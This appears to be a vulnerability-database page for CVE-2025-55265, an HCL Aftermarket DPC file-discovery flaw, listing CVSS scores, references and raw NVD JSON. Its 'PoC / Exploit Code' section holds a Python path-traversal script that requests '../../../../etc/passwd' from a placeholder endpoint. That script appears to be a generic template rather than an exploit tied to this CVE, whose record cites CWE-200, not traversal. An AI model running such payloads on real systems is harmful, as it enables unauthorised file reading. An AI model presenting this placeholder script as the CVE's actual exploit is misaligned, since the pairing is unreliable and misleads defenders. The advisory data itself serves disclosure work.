CVE-2025-55265

Description

HCL Aftermarket DPC is affected by File Discovery which allows attacker could exploit this issue to read sensitive files present in the system and may use it to craft further attacks.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:* - VULNERABLE

HCL Aftermarket DPC (具体版本请参考厂商公告 KB0129793)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: HCL Aftermarket DPC - File Discovery PoC
# Description: This script attempts to read a sensitive file using path traversal.

target_url = "http://target-ip/vulnerable_endpoint"

# Common payload for path traversal
payload = {
    "file": "../../../../etc/passwd"
}

try:
    response = requests.get(target_url, params=payload, timeout=10)
    if response.status_code == 200:
        print("[+] Vulnerability confirmed!")
        print("[+] Response:")
        print(response.text)
    else:
        print("[-] Exploit failed or target patched.")
except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-55265
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-55265
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-55265/
[4] VulDB https://vuldb.com/cve/CVE-2025-55265
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-55265", "sourceIdentifier": "[email protected]", "published": "2026-03-26T13:16:25.630", "lastModified": "2026-03-26T20:16:44.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Aftermarket DPC is affected by File Discovery which allows attacker could exploit this issue to read sensitive files present in the system and may use it to craft further attacks."}, {"lang": "es", "value": "HCL Aftermarket DPC está afectado por Descubrimiento de Archivos, lo que permite que un atacante podría explotar este problema para leer archivos sensibles presentes en el sistema y podría usarlo para elaborar ataques adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "C71E5E64-ED4C-4763-8A74-5F9DDCFD13DA"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}